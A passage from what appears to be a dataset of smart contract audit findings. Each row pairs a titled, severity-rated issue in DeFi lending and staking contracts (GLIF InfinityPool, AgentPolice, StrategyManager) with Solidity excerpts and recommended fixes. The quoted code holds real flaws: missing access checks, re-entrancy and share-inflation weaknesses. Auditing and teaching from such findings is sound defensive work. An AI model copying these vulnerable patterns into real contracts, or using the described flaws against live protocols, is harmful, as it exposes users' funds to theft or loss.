sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n\\nThis function reduces the quota that is supposed to be transferred during the `withdraw` call:\\n```\\n sendAmount = agentPolice.beneficiaryWithdrawable(receiver, msg.sender, id, sendAmount);\\n}\\nelse if (msg.sender != owner()) {\\n revert Unauthorized();\\n}\\n\\n// unwrap any wfil needed to withdraw\\n\\_poolFundsInFIL(sendAmount);\\n// transfer funds\\npayable(receiver).sendValue(sendAmount);\\n```\\n\\nThe issue is that anyone can call this function directly, and the quota will be reduced without funds being transferred.",Ensure only the Agent can call this function.,,"```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n" +An Agent Can Borrow Even With Existing Debt in Interest Payments,medium,"To `borrow` funds, an `Agent` has to call the `borrow` function of the pool:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nLet's assume that the `Agent` already had some funds borrowed. During this function execution, the current debt status is not checked. The principal debt increases after borrowing, but `account.epochsPaid` remains the same. So the pending debt will instantly increase as if the borrowing happened on `account.epochsPaid`.",Ensure the debt is paid when borrowing more funds.,,"```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n" +The AgentPolice.distributeLiquidatedFunds() Function Can Have Undistributed Residual Funds,medium,"When an Agent is liquidated, the liquidator (owner of the protocol) is supposed to try to redeem as many funds as possible and re-distribute them to the pools:\\n```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n\\nThe problem is that in the pool, it's accounted that the amount of funds can be larger than the debt. In that case, the pool won't transfer more funds than the pool needs:\\n```\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n\\nemit WriteOff(agentID, recoveredFunds, lostAmt, interestPaid);\\n```\\n\\nIf that happens, the remaining funds will be stuck in the `AgentPolice` contract.",Return the residual funds to the Agent's owner or process them in some way so they are not lost.,,"```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n" +An Agent Can Be Upgraded Even if There Is No New Implementation,medium,"Agents can be upgraded to a new implementation, and only the Agent's owner can call the upgrade function:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nThe issue is that the owner can trigger the upgrade even if no new implementation exists. Multiple possible problems derive from it.\\nUpgrading to the current implementation of the Agent will break the logic because the current version is not calling the `migrateMiner` function, so all the miners will stay with the old Agent, and their funds will be lost.\\nThe owner can accidentally trigger multiple upgrades simultaneously, leading to a loss of funds (https://github.com/ConsenSysDiligence/glif-audit-2023-04/issues/2).\\nThe owner also has no control over the new version of the Agent. To increase decentralization, it's better to pass the deployer's address as a parameter additionally.","Ensure the upgrades can only happen when there is a new version of an Agent, and the owner controls this version.",,"```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n" +Potential Re-Entrancy Issues When Upgrading the Contracts,low,"The protocol doesn't have any built-in re-entrancy protection mechanisms. That mainly explains by using the `wFIL` token, which is not supposed to give that opportunity. And also by carefully using `FIL` transfers.\\nHowever, there are some places in the code where things may go wrong in the future. For example, when upgrading an Agent:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nHere, we see the `oldAgent.decommissionAgent(newAgent);` call happens before the `oldAgent` is deleted. Inside this function, we see:\\n```\\nfunction decommissionAgent(address \\_newAgent) external {\\n // only the agent factory can decommission an agent\\n AuthController.onlyAgentFactory(router, msg.sender);\\n // if the newAgent has a mismatching ID, revert\\n if(IAgent(\\_newAgent).id() != id) revert Unauthorized();\\n // set the newAgent in storage, which marks the upgrade process as starting\\n newAgent = \\_newAgent;\\n uint256 \\_liquidAssets = liquidAssets();\\n // Withdraw all liquid funds from the Agent to the newAgent\\n \\_poolFundsInFIL(\\_liquidAssets);\\n // transfer funds to new agent\\n payable(\\_newAgent).sendValue(\\_liquidAssets);\\n}\\n```\\n\\nHere, the FIL is transferred to a new contract which is currently unimplemented and unknown. Potentially, the fallback function of this contract could trigger a re-entrancy attack. If that's the case, during the execution of this function, there will be two contracts that are active agents with the same ID, and the attacker can try to use that maliciously.","Be very cautious with further implementations of agents and pools. Also, consider using reentrancy protection in public functions.",,"```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n" +InfinityPool Is Subject to a Donation With Inflation Attack if Emtied.,low,"Since `InfinityPool` is an implementation of the ERC4626 vault, it is too susceptible to inflation attacks. An attacker could front-run the first deposit and inflate the share price to an extent where the following deposit will be less than the value of 1 wei of share resulting in 0 shares minted. The attacker could conduct the inflation by means of self-destructing of another contract. In the case of GLIF this attack is less likely on the first pool since GLIF team accepts predeposits so some amount of shares was already minted. We do suggest fixing this issue before the next pool is deployed and no pre-stake is generated.\\n```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n","Since the pool does not need to accept donations, the easiest way to handle this case is to use virtual price, where the balance of the contract is duplicated in a separate variable.",,```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n +MaxWithdraw Should Potentially Account for the Funds Available in the Ramp.,low,"Since `InfinityPool` is ERC4626 it should also support the `MaxWithdraw` method. According to the EIP it should include any withdrawal limitation that the participant could encounter. At the moment the `MaxWithdraw` function returns the maximum amount of IOU tokens rather than WFIL. Since IOU token is not the `asset` token of the vault, this behavior is not ideal.\\n```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n",We suggest considering returning the maximum amount of WFIL withdrawal which should account for Ramp balance.,,```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n +"The Upgradeability of MinerRegistry, AgentPolice, and Agent Is Overcomplicated and Has a Hight Chance of Errors. Acknowledged",low,"During the engagement, we have identified a few places that signify that the `Agent`, `MinerRegistry` and `AgentPolice` can be upgraded, for example:\\nAbility to migrate the miner from one version of the Agent to another inside the `migrateMiner`.\\nAbility to `refreshRoutes` that would update the `AgentPolice` and `MinerRegistry` addresses for a given Agent.\\nAbility to `decommission` pool. We believe that this functionality is present it is not very well thought through. For example, both `MinerRegistry` and `AgentPolice` are not upgradable but have mappings inside of them.\\n```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n\\n```\\nmapping(bytes32 => bool) private \\_minerRegistered;\\n\\nmapping(uint256 => uint64[]) private \\_minersByAgent;\\n```\\n\\nThat means that any time these contracts would need to be upgraded, the contents of those mappings will need to be somehow recreated in the new contract. That is not trivial since it is not easy to obtain all values of a mapping. This will also require an additional protocol-controlled setter ala kickstart mapping functions that are not ideal.\\nIn the case of `Agent` if the contract was upgradable there would be no need for a process of migrating miners that can be tedious and opens possibilities for errors. Since protocol has a lot of centralization and trust assumptions already, having upgradability will not contribute to it a lot.\\nWe also believe that during the upgrade of the pool, the PoolToken will stay the same in the new pool. That means that the minting and burning permissions of the share tokens have to be carefully updated or checked in a manner that does not require the address of the pool to be constant. Since we did not have access to this file, we can not check if that is done correctly.",Consider using upgradable contracts or have a solid upgrade plan that is well-tested before an emergency situation occurs.,,```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n +Mint Function in the Infinity Pool Will Emit the Incorrect Value.,low,"In the `InifinityPool` file the `mint` function recomputes the amount of the assets before emitting the event. While this is fine in a lot of cases, that will not always be true. The result of `previewMint` and `convertToAssets` will only be equal while the `totalAssets` and `totalSupply` are equal. For example, this assumption will break after the first liquidation.\\n```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n",Use the `assets` value computed by the `previewMint` when emitting the event.,,"```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n" +Potential Overpayment Due to Rounding Imprecision Won't Fix,low,"Inside the `InifintyPool` the `pay` function might accept unaccounted files. Imagine a situation where an Agent is trying to repay only the fees portion of the debt. In that case, the following branch will be executed:\\n```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n\\nThe issue is if the `value` does not divide by the `interestPerEpoch` exactly, any remainder will remain in the InfinityPool.\\n```\\nuint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n```\\n","Since the remainder will most likely not be too large this is not critical, but ideally, those remaining funds would be included in the `refund` variable.",,"```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n" +jumpStartAccount Should Be Subject to the Same Approval Checks as Regular Borrow.,low,"`InfinityPool` contract has the ability to kick start an account that will have a debt position in this pool.\\n```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n","We suggest that this action is subject to the same rules as the standard borrow action. Thus checks on DTE, LTV and DTI should be done if possible.",,"```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n" +Potential Reentrancy Into Strategies,medium,"The `StrategyManager` contract is the entry point for deposits into and withdrawals from strategies. More specifically, to `deposit` into a strategy, a staker calls `depositIntoStrategy` (or anyone calls `depositIntoStrategyWithSignature` with the staker's signature) then the asset is transferred from the staker to the strategy contract. After that, the strategy's `deposit` function is called, followed by some bookkeeping in the `StrategyManager`. For withdrawals (and slashing), the `StrategyManager` calls the strategy's `withdraw` function, which transfers the given amount of the asset to the given recipient. Both token transfers are a potential source of reentrancy if the token allows it.\\nThe `StrategyManager` uses OpenZeppelin's `ReentrancyGuardUpgradeable` as reentrancy protection, and the relevant functions have a `nonReentrant` modifier. The `StrategyBase` contract - from which concrete strategies should be derived - does not have reentrancy protection. However, the functions `deposit` and `withdraw` can only be called from the `StrategyManager`, so reentering these is impossible.\\nNevertheless, other functions could be reentered, for example, `sharesToUnderlyingView` and `underlyingToSharesView`, as well as their (supposedly) non-view counterparts.\\nLet's look at the `withdraw` function in `StrategyBase`. First, the `amountShares` shares are burnt, and at the end of the function, the equivalent amount of `token` is transferred to the depositor:\\n```\\nfunction withdraw(address depositor, IERC20 token, uint256 amountShares)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_WITHDRAWALS)\\n onlyStrategyManager\\n{\\n require(token == underlyingToken, ""StrategyBase.withdraw: Can only withdraw the strategy token"");\\n // copy `totalShares` value to memory, prior to any decrease\\n uint256 priorTotalShares = totalShares;\\n require(\\n amountShares <= priorTotalShares,\\n ""StrategyBase.withdraw: amountShares must be less than or equal to totalShares""\\n );\\n\\n // Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\n uint256 updatedTotalShares = priorTotalShares - amountShares;\\n // check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n ""StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n // Actually decrease the `totalShares` value\\n totalShares = updatedTotalShares;\\n\\n /\\*\\*\\n \\* @notice calculation of amountToSend \\*mirrors\\* `sharesToUnderlying(amountShares)`, but is different since the `totalShares` has already\\n \\* been decremented. Specifically, notice how we use `priorTotalShares` here instead of `totalShares`.\\n \\*/\\n uint256 amountToSend;\\n if (priorTotalShares == amountShares) {\\n amountToSend = \\_tokenBalance();\\n } else {\\n amountToSend = (\\_tokenBalance() \\* amountShares) / priorTotalShares;\\n }\\n\\n underlyingToken.safeTransfer(depositor, amountToSend);\\n}\\n```\\n\\nIf we assume that the `token` contract has a callback to the recipient of the transfer before the actual balance changes take place, then the recipient could reenter the strategy contract, for example, in sharesToUnderlyingView:\\n```\\nfunction sharesToUnderlyingView(uint256 amountShares) public view virtual override returns (uint256) {\\n if (totalShares == 0) {\\n return amountShares;\\n } else {\\n return (\\_tokenBalance() \\* amountShares) / totalShares;\\n }\\n}\\n```\\n\\nThe crucial point is: If the callback is executed before the actual balance change, then `sharesToUnderlyingView` will report a bad result because the shares have already been burnt. Still, the token balance has not been updated yet.\\nFor deposits, the token transfer to the strategy happens first, and the shares are minted after that:\\n```\\nfunction \\_depositIntoStrategy(address depositor, IStrategy strategy, IERC20 token, uint256 amount)\\n internal\\n onlyStrategiesWhitelistedForDeposit(strategy)\\n returns (uint256 shares)\\n{\\n // transfer tokens from the sender to the strategy\\n token.safeTransferFrom(msg.sender, address(strategy), amount);\\n\\n // deposit the assets into the specified strategy and get the equivalent amount of shares in that strategy\\n shares = strategy.deposit(token, amount);\\n```\\n\\n```\\nfunction deposit(IERC20 token, uint256 amount)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_DEPOSITS)\\n onlyStrategyManager\\n returns (uint256 newShares)\\n{\\n require(token == underlyingToken, ""StrategyBase.deposit: Can only deposit underlyingToken"");\\n\\n /\\*\\*\\n \\* @notice calculation of newShares \\*mirrors\\* `underlyingToShares(amount)`, but is different since the balance of `underlyingToken`\\n \\* has already been increased due to the `strategyManager` transferring tokens to this strategy prior to calling this function\\n \\*/\\n uint256 priorTokenBalance = \\_tokenBalance() - amount;\\n if (priorTokenBalance == 0 || totalShares == 0) {\\n newShares = amount;\\n } else {\\n newShares = (amount \\* totalShares) / priorTokenBalance;\\n }\\n\\n // checks to ensure correctness / avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(newShares != 0, ""StrategyBase.deposit: newShares cannot be zero"");\\n uint256 updatedTotalShares = totalShares + newShares;\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n ""StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n\\n // update total share amount\\n totalShares = updatedTotalShares;\\n return newShares;\\n}\\n```\\n\\nThat means if there is a callback in the token's `transferFrom` function and it is executed after the balance change, a reentering call to `sharesToUnderlyingView` (for example) will again return a wrong result because shares and token balances are not “in sync.”\\nIn addition to the reversed order of token transfer and shares update, there's another vital difference between `withdraw` and deposit: For withdrawals, the call to the token contract originates in the strategy, while for deposits, it is the strategy manager that initiates the call to the token contract (before calling into the strategy). That's a technicality that has consequences for reentrancy protection: Note that for withdrawals, it is the strategy contract that is reentered, while for deposits, there is not a single contract that is reentered; instead, it is the contract system that is in an inconsistent state when the reentrancy happens. Hence, reentrancy protection on the level of individual contracts is not sufficient.\\nFinally, we want to discuss though which functions in the strategy contract the system could be reentered. As mentioned, `deposit` and `withdraw` can only be called by the strategy manager, so these two can be ruled out. For the examples above, we considered `sharesToUnderlyingView`, which (as the name suggests) is a `view` function. As such, it can't change the state of the contract, so reentrancy through a `view` function can only be a problem for other contracts that use this function and rely on its return value. However, there is also a potentially state-changing variant, `sharesToUnderlying`, and similar potentially state-changing functions, such as `underlyingToShares` and `userUnderlying`. Currently, these functions are not actually state-changing, but the idea is that they could be and, in some concrete strategy implementations that inherit from `StrategyBase`, will be. In such cases, these functions could make wrong state changes due to state inconsistency during reentrancy.\\nThe examples above assume that the token contract allows reentrancy through its `transfer` function before the balance change has been made or in its `transferFrom` function after. It might be tempting to argue that tokens which don't fall into this category are safe to use. While the examples discussed above are the most interesting attack vectors we found, there might still be others: To illustrate this point, assume a token contract that allows reentrancy through `transferFrom` only before any state change in the token takes place. The token `transfer` is the first thing that happens in `StrategyManager._depositIntoStrategy`, and the state changes (user shares) and calling the strategy's `deposit` function occur later, this might look safe. However, if the `deposit` happens via `StrategyManager.depositIntoStrategyWithSignature`, then it can be seen, for example, that the staker's nonce is updated before the internal `_depositIntoStrategy` function is called:\\n```\\nfunction depositIntoStrategyWithSignature(\\n IStrategy strategy,\\n IERC20 token,\\n uint256 amount,\\n address staker,\\n uint256 expiry,\\n bytes memory signature\\n)\\n external\\n onlyWhenNotPaused(PAUSED\\_DEPOSITS)\\n onlyNotFrozen(staker)\\n nonReentrant\\n returns (uint256 shares)\\n{\\n require(\\n expiry >= block.timestamp,\\n ""StrategyManager.depositIntoStrategyWithSignature: signature expired""\\n );\\n // calculate struct hash, then increment `staker`'s nonce\\n uint256 nonce = nonces[staker];\\n bytes32 structHash = keccak256(abi.encode(DEPOSIT\\_TYPEHASH, strategy, token, amount, nonce, expiry));\\n unchecked {\\n nonces[staker] = nonce + 1;\\n }\\n bytes32 digestHash = keccak256(abi.encodePacked(""\\x19\\x01"", DOMAIN\\_SEPARATOR, structHash));\\n\\n\\n /\\*\\*\\n \\* check validity of signature:\\n \\* 1) if `staker` is an EOA, then `signature` must be a valid ECSDA signature from `staker`,\\n \\* indicating their intention for this action\\n \\* 2) if `staker` is a contract, then `signature` must will be checked according to EIP-1271\\n \\*/\\n if (Address.isContract(staker)) {\\n require(IERC1271(staker).isValidSignature(digestHash, signature) == ERC1271\\_MAGICVALUE,\\n ""StrategyManager.depositIntoStrategyWithSignature: ERC1271 signature verification failed"");\\n } else {\\n require(ECDSA.recover(digestHash, signature) == staker,\\n ""StrategyManager.depositIntoStrategyWithSignature: signature not from staker"");\\n }\\n\\n shares = \\_depositIntoStrategy(staker, strategy, token, amount);\\n}\\n```\\n\\nHence, querying the staker's nonce in reentrancy would still give a result based on an “incomplete state change.” It is, for example, conceivable that the staker still has zero shares, and yet their nonce is already 1. This particular situation is most likely not an issue, but the example shows that reentrancy can be subtle.","This is fine if the token doesn't allow reentrancy in the first place. As discussed above, among the tokens that do allow reentrancy, some variants of when reentrancy can happen in relation to state changes in the token seem more dangerous than others, but we have also argued that this kind of reasoning can be dangerous and error-prone. Hence, we recommend employing comprehensive and defensive reentrancy protection based on reentrancy guards such as OpenZeppelin's ReentrancyGuardUpgradeable, which is already used in the `StrategyManager`.\\nUnfortunately, securing a multi-contract system against reentrancy can be challenging, but we hope the preceding discussion and the following pointers will prove helpful:\\nExternal functions in strategies that should only be callable by the strategy manager (such as `deposit` and withdraw) should have the `onlyStrategyManager` modifier. This is already the case in the current codebase and is listed here only for completeness.\\nExternal functions in strategies for which item 1 doesn't apply (such as `sharesToUnderlying` and underlyingToShares) should query the strategy manager's reentrancy lock and revert if it is set.\\nIn principle, the restrictions above also apply to `public` functions, but if a `public` function is also used internally, checks against reentrancy can cause problems (if used in an `internal` context) or at least be redundant. In the context of reentrancy protection, it is often easier to split `public` functions into an `internal` and an `external` one.\\nIf `view` functions are supposed to give reliable results (either internally - which is typically the case - or for other contracts), they have to be protected too.\\nThe previous item also applies to the StrategyManager: `view` functions that provide correct results should query the reentrancy lock and revert if it is set.\\nSolidity automatically generates getters for `public` state variables. Again, if these (external view) functions must deliver correct results, the same measures must be taken for explicit `view` functions. In practice, the state variable has to become `internal` or `private`, and the getter function must be hand-written.\\nThe `StrategyBase` contract provides some basic functionality. Concrete strategy implementations can inherit from this contract, meaning that some functions may be overridden (and might or might not call the overridden version via super), and new functions might be added. While the guidelines above should be helpful, derived 